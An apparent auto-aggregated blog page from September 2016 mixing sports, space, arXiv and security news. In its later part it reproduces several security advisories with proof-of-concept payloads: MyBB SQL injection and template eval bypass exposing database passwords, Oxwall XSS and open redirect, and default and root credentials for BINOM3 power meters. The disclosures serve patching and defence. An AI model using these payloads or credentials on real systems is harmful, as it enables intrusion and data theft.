Latest YouTube Video

Saturday, September 17, 2016

Ravens: Sr. defensive assistant Clarence Brooks, 65, dies following battle with cancer; was team's longest-tenured coach (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

British Court rules Hacktivist 'Lauri Love' can be extradited to USA

British citizen and alleged hacker Lauri Love will be extradited to the United States to face allegations of hacking into United States government computer systems, a UK judge ruled on Friday. Love, 31, is currently facing up to 99 years in prison for allegedly hacking into the FBI, the US Army, the US Missile Defence Agency, the National Aeronautics and Space Administration (NASA), and New


from The Hacker News http://ift.tt/2cEim7T
via IFTTT

Friday, September 16, 2016

Orioles Video: Michael Bourn, Manny Machado and Matt Wieters combine to get the final out at home in 5-4 win vs. Rays (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Orioles: Mark Trumbo (back spasms) out of lineup Friday vs. Rays; Buck Showalter hopeful he will start Saturday (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Paper retracts anonymous quotation after PatientsLikeMe able to identify speaker

Expert Systems and Applications has removed a paper on increasing the privacy on patients on social media sites after PatientsLikeMe's Paul Wicks ...

from Google Alert - anonymous http://ift.tt/2d0VaCO
via IFTTT

Flagging a node as an anonymous user doesn't work with Rules

I created a simple Rule that flags comment:node after a comment was edited. This works fine for registered users, but not for anonymous users.

from Google Alert - anonymous http://ift.tt/2cdjaMM
via IFTTT

Instead of spending $1.3 million, FBI could have Hacked iPhone in just $100

Do you remember the infamous encryption fight between the FBI and Apple for unlocking an iPhone 5C belongs to a terrorist? Yes, you got it right, the same Apple vs. FBI case where the FBI paid almost $1.3 Million to a group of hackers to unlock that iPhone. However, if the agency had shown some patience to explore more ways to get into that iPhone, then it might have cost them nothing less


from The Hacker News http://ift.tt/2cPG02M
via IFTTT

Heitkamp Condemns Anonymous Online Threats against Officials, Law Enforcement

WASHINGTON, D.C. – U.S. Senator Heidi Heitkamp today issued a statement condemning recent anonymous threats made online against federal, ...

from Google Alert - anonymous http://ift.tt/2d0r1Ue
via IFTTT

Anonymous (Original Mix)

Check out Anonymous (Original Mix) by Kill Dyl on Beatport.

from Google Alert - anonymous http://ift.tt/2d3rkty
via IFTTT

Configure anonymous sessions

You must create an unauthenticated Store using StoreFront to support an anonymous session in the Linux VDA. Follow the instructions for creating an ...

from Google Alert - anonymous http://ift.tt/2cCnp8S
via IFTTT

ISS Daily Summary Report – 09/15/2016

NanoRack Cubesat Deployer (NRCSD) #9 Deployment: Overnight, ground controllers deployed the remaining three of four pairs of Planet Lab DoveSats from the NRCSD #9.  This deployment titled “Flock 2” is a fleet of nanosatellites designed, built and operated by Planet Labs Inc., and will enable imagery of the changing planet to be taken on a frequent basis, with humanitarian and environmental applications ranging from monitoring deforestation and the ice caps to disaster relief and improving agriculture yields in developing nations.  Electrostatic Levitation Furnace (ELF) Troubleshooting:  Following the software load yesterday, FE-5 reassembled the ELF and installed the assembled ELF into the Multi-Purpose Small Payload Rack (MSPR)-2 Work Volume. Ground controllers will be performing checkout activities on the new loaded software.  The Electrostatic Levitation Furnace (ELF) is an experimental facility designed to levitate/melt/solidify materials by containerless processing techniques using the Electrostatic Levitation method. With this facility, thermophysical properties of high temperature melts can be measured, and solidification from deeply undercooled melts can be achieved. The ELF is located in the JEM Multipurpose Small Payload Rack (MSPR) in Kibo. Combustion Integration Rack (CIR) Igniter Replacement:  FE-6 replaced two Multi-user Droplet Combustion Apparatus (MDCA) Igniter Tips.  The crew removed the MDCA Chamber Insert Assembly (CIA), replaced the igniters and reinstalled the chamber.  As the crew was reconnecting the CIR Moderate Temperature Loop (MTL) lines, an Internal Thermal Control Systems (ITCS) fluid leak was identified.  In coordination with ground controllers, preliminary indications are the MDCA Water Return line will need to be replaced.  The crew was provided with steps to close the rack and further troubleshooting steps will be scheduled. The next experiment to utilize CIR will be the FLame EXtinguishment (FLEX)-2 investigation will be resumed, with Data Set 1 using decane fuel.  FLEX-2 is the second experiment to fly on the ISS which uses small droplets of fuel to study the special spherical characteristics of burning fuel droplets in space. The FLEX-2 experiment studies how quickly fuel burns, the conditions required for soot to form, and how mixtures of fuels evaporate before burning. Understanding these processes could lead to the production of a safer spacecraft as well as increased fuel efficiency for engines using liquid fuel on Earth. Biomolecule Sequencer (BMS) Sample Stop: FE-6 completed the 48-hour sample session.  The crew completed the analysis, captured a screenshot of the Surface Pro 3, and downlinked the screenshot image to the ground for the BMS team to evaluate.  The goals of the BMS experiment are to provide a proof-of-concept for the functionality and evaluate crew operability of a DNA sequencer in a space/microgravity environment.  The capability for sequencing of DNA in space could provide for a better ability to identify microbes in real-time, instead of requiring sample return and ground based analysis.  Manufacturing Device (MD): The crew attempted to remove the printed calibration objects from the Manufacturing Device.  Two of three pieces of a print were successfully removed and stowed.  The crew was unable to remove the third print from the MD volume.  Ground specialists are looking into further steps to remove the print.  Manufacturing Device consists of the Additive Manufacturing Facility (AMF), a permanent manufacturing facility on the ISS, providing hardware manufacturing services. The ability to manufacture on the ISS enables on-demand repair and production capability, as well as essential research for manufacturing on long-term missions. AMF allows for immediate repair of essential components, upgrades of existing hardware, installation of new hardware that is manufactured, and the manufacturing capability to support commercial interests on the ISS. Japanese Experiment Module (JEM) Window Inspection:  The crew inspected JEM Windows for contamination and damage. This inspection documents any contamination or damage there may be on any of the window pane surfaces. The crew stated that no major defects were identified.  This is nominal periodic maintenance. Health Maintenance System (HMS) Crew Medical Officer (CMO) Training: FE-6 completed a refresher course on some of the equipment and procedures taught in the CMO classes covering crew illness and/or injury. Lessons include text, pictures and video detailing previously learned medical procedures and hardware.  Nitrogen/Oxygen Recharge System (NORS) Setup and Oxygen Transfer: The crew terminated the NORS transfer O2 to the US Airlock High Pressure Gas Tanks (HPGTs) and reconfigured for transfer to the Low Pressure Gas Tanks (LPGTs).  At the end of the day, they terminated the transfer to the LPGT.  Today’s Planned Activities All activities were completed unless otherwise noted. Nitrogen Oxygen Recharge System (NORS) Oxygen Transfer to Low Pressure O2 Tank Total Organic Carbon Analyzer (TOCA) Water Recovery System (WRS) Sample Analysis ISS HAM Columbus Pass Scheduled maintenance of Central Post Laptop АБ№7,8 СЭП СМ photographing JEM Window Inspection P/TV Setup Multi-user Droplet Combustion Apparatus Session Review JPM Window Inspection Procedure Review Combustion Integrated Rack Hardware Gather TM750 Camcorder Setup Electrostatic Levitation Furnace (ELF) Reassemble Changeout of Dust Filter ПФ1-4 Cartridges in SM Electrostatic Levitation Furnace (ELF) Reassemble Sub Electrostatic Levitation Furnace (ELF) Ground Attaching Total Organic Carbon Analyzer (TOCA) Sample Data Record ALGOMETRIA. Experiment Ops MSPR2 Electrostatic Levitation Furnace (ELF) Install to Work Volume Multi purpose Small Payload Rack 2(MSPR2) Electrostatic Levitation Furnace (ELF) Install Sub Systems Operations Data File (SODF) Deploy Multi-user Droplet Combustion Apparatus MWA Prep RGN Waste Storage Tank Assembly (WSTA) Fill JPM Window Inspection Part 1 Combustion Integrated Rack Rack Doors Open Combustion Integrated Rack Front End Cap Open MSPR2 Electrostatic Levitation Furnace (ELF) Cable Connection CALCIUM. Experiment Session 9 Multi-user Droplet Combustion Apparatus Hardware Replacement TM750 Camcorder Deactivation Advanced Resistive Exercise Device (ARED) 6-Month Maintenance Combustion Integrated Rack Front End Cap Close Combustion Integrated Rack Rack Doors Close Combustion Integrated Rack Hardware Return Plant RNA Regulation/European Modular Cultivation System Maintenance Work Area Prep and Config Crew Handover Conference Phase Change HX Locker Install 2 RGN Waste Storage Tank Assembly (WSTA) Fill СОЖ Maintenance Manufacturing Device Print Removal, Clean and Stow JPM Window Inspection Part 2 NORS Oxygen Transfer Termination Biomolecule Sequencer Sample Stop JPM Window Inspection Image Downlink Completed Task List Items EVA Tool Stow Part 3 Ground Activities All activities were completed […]

from ISS On-Orbit Status Report http://ift.tt/2cw964u
via IFTTT

Using 'Signal' for Encrypted Chats? You Shouldn't Skip Its Next Update

Two Researchers have discovered several vulnerabilities in Signal, the popular end-to-end encrypted messaging app recommended by whistleblower Edward Snowden. One of those vulnerabilities could allow potential attackers to add random data to the attachments of encrypted messages sent by Android users, while another bug could allow hackers to remotely execute malicious code on the targeted


from The Hacker News http://ift.tt/2cBS85O
via IFTTT

Retrograde Mars and Saturn


Wandering Mars and Saturn have spent much of this year remarkably close in planet Earth's night sky. In a sequence of exposures spanning mid-December 2015 through the beginning of this week, this composited skyview follows their time together, including both near opposition, just north of bright star Antares near the Milky Way's central bulge. In the corresponding video, Saturn's apparent movement is seen to be back and forth along the flattened, compact loop, while Mars traces the wider, reversing S-shaped track from upper right to lower left through the frame. To connect the dots and dates just slide your cursor over the picture (or follow this link). It looks that way, but Mars and Saturn don't actually reverse direction along their orbits. Instead, their apparent backwards or retrograde motion with respect to the background stars is a reflection of the orbital motion of the Earth itself. Retrograde motion can be seen each time Earth overtakes and laps planets orbiting farther from the Sun, the Earth moving more rapidly through its own relatively close-in orbit. via NASA http://ift.tt/2cpDnjE

Arctic Sea Ice from March to September 2016

Satellite-based passive microwave images of the sea ice have provided a reliable tool for continuously monitoring changes in the Arctic ice since 1979. Every summer the Arctic ice cap melts down to what scientists call its "minimum" before colder weather begins to cause ice cover to increase. The first six months of 2016 have been the warmest first half of any year in our recorded history of surface temperature (which go back to 1880). Data shows that the Arctic temperature increases are much bigger, relatively, than the rest of the globe. The Japan Aerospace Exploration Agency (JAXA) provides many water-related products derived from data acquired by the Advanced Microwave Scanning Radiometer 2 (AMSR2) instrument aboard the Global Change Observation Mission 1st-Water "SHIZUKU" (GCOM-W1) satellite. Two JAXA datasets used in this animation are the 10-km daily sea ice concentration and the 10 km daily 89 GHz Brightness Temperature. In this animation, the daily Arctic sea ice and seasonal land cover change progress through time, from the prior sea ice maximum on March 24, 2016, through September 10, 2016 when the sea ice reached its annual minimum extent. Over the water, Arctic sea ice changes from day to day showing a running 3-day minimum sea ice concentration in the region where the concentration is greater than 15. The blueish white color of the sea ice is derived from a 3-day running minimum of the AMSR2 89 GHz brightness temperature. Over the terrain, monthly data from the seasonal Blue Marble Next Generation fades slowly from month to month.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/2czXnBv
via IFTTT

Thursday, September 15, 2016

Bayesian Reinforcement Learning: A Survey. (arXiv:1609.04436v1 [cs.AI])

Bayesian methods for machine learning have been widely investigated, yielding principled methods for incorporating prior information into inference algorithms. In this survey, we provide an in-depth review of the role of Bayesian methods for the reinforcement learning (RL) paradigm. The major incentives for incorporating Bayesian reasoning in RL are: 1) it provides an elegant approach to action-selection (exploration/exploitation) as a function of the uncertainty in learning; and 2) it provides a machinery to incorporate prior knowledge into the algorithms. We first discuss models and methods for Bayesian inference in the simple single-step Bandit model. We then review the extensive recent literature on Bayesian methods for model-based RL, where prior information can be expressed on the parameters of the Markov model. We also present Bayesian methods for model-free RL, where priors are expressed over the value function or policy class. The objective of the paper is to provide a comprehensive survey on Bayesian RL algorithms and their theoretical and empirical properties.



from cs.AI updates on arXiv.org http://ift.tt/2cSeb5O
via IFTTT

Column Networks for Collective Classification. (arXiv:1609.04508v1 [cs.AI])

Relational learning deals with data that are characterized by relational structures. An important task is collective classification, which is to jointly classify networked objects. While it holds a great promise to produce a better accuracy than non-collective classifiers, collective classification is computational challenging and has not leveraged on the recent breakthroughs of deep learning. We present Column Network (CLN), a novel deep learning model for collective classification in multi-relational domains. CLN has many desirable theoretical properties: (i) it encodes multi-relations between any two instances; (ii) it is deep and compact, allowing complex functions to be approximated at the network level with a small set of free parameters; (iii) local and relational features are learned simultaneously; (iv) long-range, higher-order dependencies between instances are supported naturally; and (v) crucially, learning and inference are efficient, linear in the size of the network and the number of relations. We evaluate CLN on multiple real-world applications: (a) delay prediction in software projects, (b) PubMed Diabetes publication classification and (c) film genre classification. In all applications, CLN demonstrates a higher accuracy than state-of-the-art rivals.



from cs.AI updates on arXiv.org http://ift.tt/2cJv6KQ
via IFTTT

Context Aware Nonnegative Matrix Factorization Clustering. (arXiv:1609.04628v1 [cs.CV])

In this article we propose a method to refine the clustering results obtained with the nonnegative matrix factorization (NMF) technique, imposing consistency constraints on the final labeling of the data. The research community focused its effort on the initialization and on the optimization part of this method, without paying attention to the final cluster assignments. We propose a game theoretic framework in which each object to be clustered is represented as a player, which has to choose its cluster membership. The information obtained with NMF is used to initialize the strategy space of the players and a weighted graph is used to model the interactions among the players. These interactions allow the players to choose a cluster which is coherent with the clusters chosen by similar players, a property which is not guaranteed by NMF, since it produces a soft clustering of the data. The results on common benchmarks show that our model is able to improve the performances of many NMF formulations.



from cs.AI updates on arXiv.org http://ift.tt/2cSe1eP
via IFTTT

Sequencing Chess. (arXiv:1609.04648v1 [cs.AI])

We analyze the structure of the state space of chess by means of transition path sampling Monte Carlo simulation. Based on the typical number of moves required to transpose a given configuration of chess pieces into another, we conclude that the state space consists of several pockets between which transitions are rare. Skilled players explore an even smaller subset of positions that populate some of these pockets only very sparsely. These results suggest that the usual measures to estimate both, the size of the state space and the size of the tree of legal moves, are not unique indicators of the complexity of the game, but that topological considerations are equally important.



from cs.AI updates on arXiv.org http://ift.tt/2cJw9dM
via IFTTT

Concordance and the Smallest Covering Set of Preference Orderings. (arXiv:1609.04722v1 [cs.AI])

Preference orderings are orderings of a set of items according to the preferences (of judges). Such orderings arise in a variety of domains, including group decision making, consumer marketing, voting and machine learning. Measuring the mutual information and extracting the common patterns in a set of preference orderings are key to these areas. In this paper we deal with the representation of sets of preference orderings, the quantification of the degree to which judges agree on their ordering of the items (i.e. the concordance), and the efficient, meaningful description of such sets.

We propose to represent the orderings in a subsequence-based feature space and present a new algorithm to calculate the size of the set of all common subsequences - the basis of a quantification of concordance, not only for pairs of orderings but also for sets of orderings. The new algorithm is fast and storage efficient with a time complexity of only $O(Nn^2)$ for the orderings of $n$ items by $N$ judges and a space complexity of only $O(\min\{Nn,n^2\})$.

Also, we propose to represent the set of all $N$ orderings through a smallest set of covering preferences and present an algorithm to construct this smallest covering set.



from cs.AI updates on arXiv.org http://ift.tt/2cSdzgv
via IFTTT

The multi-vehicle covering tour problem: building routes for urban patrolling. (arXiv:1309.5502v2 [cs.AI] UPDATED)

In this paper we study a particular aspect of the urban community policing: routine patrol route planning. We seek routes that guarantee visibility, as this has a sizable impact on the community perceived safety, allowing quick emergency responses and providing surveillance of selected sites (e.g., hospitals, schools). The planning is restricted to the availability of vehicles and strives to achieve balanced routes. We study an adaptation of the model for the multi-vehicle covering tour problem, in which a set of locations must be visited, whereas another subset must be close enough to the planned routes. It constitutes an NP-complete integer programming problem. Suboptimal solutions are obtained with several heuristics, some adapted from the literature and others developed by us. We solve some adapted instances from TSPLIB and an instance with real data, the former being compared with results from literature, and latter being compared with empirical data.



from cs.AI updates on arXiv.org http://ift.tt/18m44gL
via IFTTT

Learning from networked examples. (arXiv:1405.2600v2 [cs.AI] UPDATED)

Many machine learning algorithms are based on the assumption that training examples are drawn identically and independently. However, this assumption does not hold anymore when learning from a networked sample because two or more training examples may share some common objects, and hence share the features of these shared objects. We first show that the classic approach of ignoring this problem potentially can have a disastrous effect on the accuracy of statistics, and then consider alternatives. One of these is to only use independent examples, discarding other information. However, this is clearly suboptimal. We analyze sample error bounds in a networked setting, providing both improved and new results. Next, we propose an efficient weighting method which achieves a better sample error bound than those of previous methods. Our approach is based on novel concentration inequalities for networked variables.



from cs.AI updates on arXiv.org http://ift.tt/1ggs7qe
via IFTTT

A Discrete and Bounded Envy-Free Cake Cutting Protocol for Any Number of Agents. (arXiv:1604.03655v9 [cs.DS] UPDATED)

We consider the well-studied cake cutting problem in which the goal is to find an envy-free allocation based on queries from $n$ agents. The problem has received attention in computer science, mathematics, and economics. It has been a major open problem whether there exists a discrete and bounded envy-free protocol. We resolve the problem by proposing a discrete and bounded envy-free protocol for any number of agents. The maximum number of queries required by the protocol is $n^{n^{n^{n^{n^n}}}}$. We additionally show that even if we do not run our protocol to completion, it can find in at most $n^{n+1}$ queries a partial allocation of the cake that achieves proportionality (each agent gets at least $1/n$ of the value of the whole cake) and envy-freeness. Finally we show that an envy-free partial allocation can be computed in $n^{n+1}$ queries such that each agent gets a connected piece that gives the agent at least $1/(3n)$ of the value of the whole cake.



from cs.AI updates on arXiv.org http://ift.tt/1Q85mzr
via IFTTT

[FD] BINOM3 Electric Power Quality Meter Vulnerabilities

*Universal multifunctional Electric Power Quality Meter BINOM3 - Multiple Vulnerabilities* *About* The meters are designed for autonomous operation in automated systems: • SCADA systems • Data aquisition and transmission systems • Automated data and measurement systems for revenue and technical power metering • Power quality monitoring and control systems • Automated process control systems, Management information system +++++ *Submitted to ICS-CERT *- May 25, 2016. *No response from vendor till date.* +++++ *Vulnerability Information* *HTTP* 1. *Reflected **XSS* – multiple urls, parameters Successful exploitation of this vulnerability could allow an unauthenticated as well as authenticated, attacker to inject arbitrary JavaScript in a specially crafted URL request where the response containing user data is returned to the web browser without being made safe to display. 2. *Stored **XSS* – multiple urls, parameters Successful exploitation of this vulnerability could allow an authenticated attacker to inject arbitrary JavaScript in specific input fields, which get stored in the underlying db, and once accessed, the data including malicious scripts, is returned to the web browser leading to script execution. 3. *Weak Credentials Management * The device comes configured with four (4) login accounts: - admin / 1 - user / 1 - alg / 1 - telem / 1 3a) These passwords do not meet even basic security criterion. 3b) To further make it easier for attacker(s), the application design does not provide the users, any option to change their own passwords in device management portal. Only 'root' can change passwords for all other accounts. (AFAIK) 4.* Undocumented root account * In addition to the above four documented login accounts, there is a 'root' superuser account: - root / root - root account details are not documented in the device administration guide or manuals - root account has multiple, additional functions accessible like user management 5. *Sensitive Information stored in clear-text * - all user passwords are stored / viewable in clear-text Additionally, specific non-root, non-privileged users can access complete device configuration file, which contains clear-text passwords and other config information. This flaw can be used to gain privileged access to the device. 6*. Vulnerable to Cross-Site Request Forgery * There is no CSRF Token generated per page and / or per (sensitive) function. Successful exploitation of this vulnerability can allow silent execution of unauthorized actions on the device such as configuration parameter changes, and saving modified configuration. 7. *Sensitive information leakage* Every time ‘root’ logs in, a GET request is made to a specific url to access password configuration file. Response comes as xml data, and contains all accounts and their passwords. As, by default, the management portal is configured for HTTP, a suitably positioned attacked can sniff all login credentials, and gain privileged access. *Telnet * 1. *Access Control Issues* By default, password authentication is not enabled on Telnet access (AFAIK). - This access gives superuser-level access to device - Access to the device provides detailed info on application, configuration, device file system, databases (including Energy & billing), consumption, Statistics, network information, as well as clear-text creds (FTP) - Easy vector to device & data compromise +++++

Source: Gmail -> IFTTT-> Blogger

[FD] Oxwall 1.8.0: XSS & Open Redirect

Security Advisory - Curesec Research Team 1. Introduction Affected Product: Oxwall 1.8.0 (build 9900) Fixed in: 1.8.2 Fixed Version Link: http://ift.tt/2d3ytNb Vendor Website: http://www.oxwall.org/ Vulnerability Type: XSS & Open Redirect Remote Exploitable: Yes Reported to vendor: 11/21/2015 Disclosed to public: 09/15/2016 Release mode: Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview Oxwall is a social networking software written in PHP. In version 1.8.0, it is vulnerable to multiple XSS attacks and a persistent open redirect. The XSS vulnerabilities are reflected as well as persistent, and can lead to the stealing of cookies, injection of keyloggers, or the bypassing of CSRF protection. 3. Details XSS 1: Reflected XSS CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N When performing a ping request, the method value is echoed unencoded, leading to reflected XSS. Proof of Concept:
","params":{}}]}" />
Code: ow_system_plugins/base/controllers/ping.php $responseStack[] = array( 'command' => $c['command'], 'result' => $event->getData() ); } echo json_encode(array( 'stack' => $responseStack )); XSS 2: Persistent XSS CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N The name of a photo album is vulnerable to persistent XSS in two places: When viewing a user profile, and after editing the album. Both of these are DOM based XSS vulnerabilities, and both of these require some interaction of the victim, eg hovering or clicking. Proof of Concept: 0. Register an account 1. Create a new album with the name '"> 2. Visit the users profile: http://localhost/oxwall-1.8.0/user/[username] 3. Hover over the image belonging to that album An alternative to steps 2. and 3. is: 2. use CSRF to log the victim into the account with the injected album name 3. Use ClickJacking to get user to click "Edit Album" and then click "Done" XSS 3: Self-XSS CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N The chat window is vulnerable to self-XSS. It may be possible to exploit this issue via ClickJacking in some browsers. Proof of Concept: Open a chat and paste the following into the text field (there is no need to send it, although that would trigger the vulnerability again as well): '"> Persistent Open Redirect CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N The real name of a user is echoed inside meta tags without proper encoding. Tags are stripped, which prevents an attacker from adding new tags, but it is still possible to add additional attributes to the meta tag, leading to an open redirect and potentially XSS in older browsers. Proof of Concept: 1. Register a new user. As real name use: 5;URL=http://google.com/" http-equiv="refresh" foo=" 2. Visit the profile of that user: http://localhost/oxwall-1.8.0/user/[username] 4. Solution To mitigate this issue please upgrade at least to version 1.8.2. Please note that a newer version might already be available. 5. Report Timeline 11/21/2015 Informed Vendor about Issue (no reply) 12/10/2015 Reminded Vendor of Disclosure Date 12/15/2015 Vendor requests more time 01/13/2016 Contacted Vendor, Vendor requests more time 02/01/2016 Contacted Vendor, Vendor requests more time 02/22/2016 Vendor releases fix 09/15/2016 Disclosed to public Blog Reference: http://ift.tt/2d3yErG

Source: Gmail -> IFTTT-> Blogger

[FD] MyBB 1.8.6: Improper validation of data passed to eval

Security Advisory - Curesec Research Team 1. Introduction Affected Product: MyBB 1.8.6 Fixed in: 1.8.7 Fixed Version Link: http://ift.tt/2cMIP1X Vendor Website: http://www.mybb.com/ Vulnerability Type: Improper validation of data passed to eval Remote Exploitable: Yes Reported to vendor: 01/29/2016 Disclosed to public: 09/15/2016 Release mode: Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview MyBB is forum software written in PHP. In version 1.8.6, it improperly validates templates that are passed to eval, allowing for the disclosure of the database password. If the database is writable from remote, it may also lead to code execution. An admin account is required. 3. Details Description CVSS: Low 3.5 AV:N/AC:M/Au:S/C:P/I:N/A:N MyBB allows an admin to edit templates. These templates can contain HTML, and it is possible to read out the content of PHP variables as well as the properties of objects. There are filters in place which should make it impossible to call functions or to read out sensitive information such as database credentials. Templates are used as following: eval('$variable = "'.$templates->get('templateName').'";'); $templates->get returns the template as saved in the database, with double quotes and slashes escaped. When saving a template, the template is passed to the check_template function to check if it contains malicious content. The checks try to prevent the reading of the database password as well as the calling of functions. This means that none of the naive attempts to read out the database password - eg $config['database']['password'], $config[database][password], or $config ["database"]["password"] - would work. However, it is still possibly to read out the database password by setting the value of an existing variable to "password" and using that variable when reading out the password, thus bypassing the filter. Proof of Concept First, edit a template such as the usercp_profile_contact_fields_field template: http://localhost/mybb_1806/Upload/admin/index.php?module=style-templates&action=edit_template&title=usercp_profile_contact_fields_field&sid=1&expand=15 Add this line at the beginning: {$cfvalue}: {$config['database'][$cfvalue]} Now, visit the profile: http://localhost/mybb_1806/Upload/usercp.php?action=profile As any of the "Additional Contact Information" values, use "password" to read out the database password, "hostname" to read out the hostname, and "username" to read out the user. In case that the database is writable from remote, an attacker could now also gain code execution, as check_template is applied when saving templates, not when loading them. Example query: UPDATE mybb_templates SET template="{${phpinfo()}}" WHERE title= "usercp_profile_contact_fields_field"; Visiting the profile will execute the injected code. Code inc/config.php $config['database']['password'] = '[THE_DATABASE_PASSWORD]'; admin/inc/functions.php function check_template($template) { // Check to see if our database password is in the template if(preg_match("#database'?\\s*\]\\s*\[\\s*'?password#", $template)) { return true; } // System calls via backtick if(preg_match('#\$\s*\{#', $template)) { return true; } // Any other malicious acts? // Courtesy of ZiNgA BuRgA if(preg_match("~\\{\\$.+?\\}~s", preg_replace('~\\{\\$+[a-zA-Z_][a-zA-Z_0-9]*((?:-\\>|\\:\\:)\\$*[a-zA-Z_][a-zA-Z_0-9]*|\\[\s*\\$*([\'"]?)[a-zA-Z_ 0-9 ]+\\2\\]\s*)*\\}~', '', $template))) { return true; } return false; } usercp.php (as one example) foreach(array('icq', 'aim', 'yahoo', 'skype', 'google') as $cfield) { $contact_fields[$cfield] = ''; $csetting = 'allow'.$cfield.'field'; if($mybb->settings[$csetting] == '') { continue; } if(!is_member($mybb->settings[$csetting])) { continue; } $cfieldsshow = true; $lang_string = 'contact_field_'.$cfield; $lang_string = $lang->{$lang_string}; $cfvalue = htmlspecialchars_uni($user[$cfield]); eval('$contact_fields[$cfield] = "'.$templates->get('usercp_profile_contact_fields_field').'";'); } 4. Solution To mitigate this issue please upgrade at least to version 1.8.7: http://ift.tt/2cMIP1X Please note that a newer version might already be available. 5. Report Timeline 01/29/2016 Informed Vendor about Issue 02/26/2016 Vendor requests more time 03/11/2016 Vendor releases fix 09/15/2016 Disclosed to public Blog Reference: http://ift.tt/2cMJ2Sr

Source: Gmail -> IFTTT-> Blogger

[FD] MyBB 1.8.6: SQL Injection

Security Advisory - Curesec Research Team 1. Introduction Affected Product: MyBB 1.8.6 Fixed in: 1.8.7 Fixed Version Link: http://ift.tt/2cMIP1X Vendor Website: http://www.mybb.com/ Vulnerability Type: SQL Injection Remote Exploitable: Yes Reported to vendor: 01/29/2016 Disclosed to public: 09/15/2016 Release mode: Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview MyBB is forum software written in PHP. In version 1.8.6, it is vulnerable to a second order SQL injection by an authenticated admin user, allowing the extraction of data from the database. 3. Details Description CVSS: Medium 6.0 AV:N/AC:M/Au:S/C:P/I:P/A:P The setting threadsperpage is vulnerable to second order error based SQL injection. An admin account is needed to change this setting. The injection takes place into a LIMIT clause, and the query also uses ORDER BY, making an injection of UNION ALL not possible, but it is still possibly to extract information. Proof of Concept Go to the settings page: http://localhost/mybb_1806/Upload/admin/index.php?module=config-settings&action=change&gid=7 For Setting "threadsperpage" use: 20 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1); Visit a forum to trigger injected code: http://localhost/mybb_1806/Upload/forumdisplay.php?fid=3 The result will be: SQL Error: 1105 - XPATH syntax error: ':5.5.33-1' Query: SELECT t.*, (t.totalratings/t.numratings) AS averagerating, t.username AS threadusername, u.username FROM mybb_threads t LEFT JOIN mybb_users u ON (u.uid = t.uid) WHERE t.fid='3' AND t.visible IN (-1,0,1) ORDER BY t.sticky DESC, t.lastpost desc LIMIT 0, 20 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1); Code forumdisplay.php $perpage = $mybb->settings['threadsperpage']; [...] $query = $db->query(" SELECT t.*, {$ratingadd}t.username AS threadusername, u.username FROM ".TABLE_PREFIX."threads t LEFT JOIN ".TABLE_PREFIX."users u ON (u.uid = t.uid) WHERE t.fid='$fid' $tuseronly $tvisibleonly $datecutsql2 $prefixsql2 ORDER BY t.sticky DESC, {$t}{$sortfield} $sortordernow $sortfield2 LIMIT $start, $perpage "); 4. Solution To mitigate this issue please upgrade at least to version 1.8.7: http://ift.tt/2cMIP1X Please note that a newer version might already be available. 5. Report Timeline 01/29/2016 Informed Vendor about Issue 02/26/2016 Vendor requests more time 03/11/2016 Vendor releases fix 09/15/2016 Disclosed to public Blog Reference: http://ift.tt/2d3zbtK

Source: Gmail -> IFTTT-> Blogger

[FD] MyBB 1.8.6: CSRF, Weak Hashing, Plaintext Passwords

Security Advisory - Curesec Research Team 1. Introduction Affected Product: MyBB 1.8.6 Fixed in: not fixed Fixed Version Link: n/a Vendor Website: http://www.mybb.com/ Vulnerability Type: CSRF, Weak Hashing, Plaintext Passwords Remote Exploitable: Yes Reported to vendor: 01/29/2016 Disclosed to public: 09/15/2016 Release mode: Full Disclosure / Informational CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview MyBB 1.8.6 is vulnerable to login CSRF. Additionally, it stores passwords using weak hashing, and sends passwords via email in plaintext. 3. Login CSRF Description CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N The login of MyBB does not have any CSRF protection. The impact of this is low, but a victim could provide sensitive information under a fake account. An example would be the accidental sending of a sensitive private message while being logged into an account controlled by an attacker. Additionally, a login CSRF makes it possible to exploit possible vulnerabilities in the user area, such as XSS. Proof of Concept
4. Weak Hashing Description MyBB uses md5 for hashing passwords, which is not considered secure. The hashing used is: $hash = md5(md5($salt).md5($password)); 5. Passwords Emailed in Plaintext Description When passwords are reset, the generated 8 character password is send to the user via email in plaintext. It is suggested that users change these passwords, but a change is not required. It is recommended to use a password reset token instead, and to force the user to create a new password themselves. 6. Solution This issue was not fixed by the vendor. 7. Report Timeline 01/29/2016 Informed Vendor about Issue 02/26/2016 Vendor requests more time 03/11/2016 Vendor releases new version 03/15/2016 Requested information about unfixed issues 03/15/2016 Vendor considers issues minor and will not fix them for now 09/15/2016 Disclosed to public Blog Reference: http://ift.tt/2crrZce

Source: Gmail -> IFTTT-> Blogger

[FD] Kajona 4.7: XSS & Directory Traversal

[FD] Peel Shopping 8.0.2: Object Injection

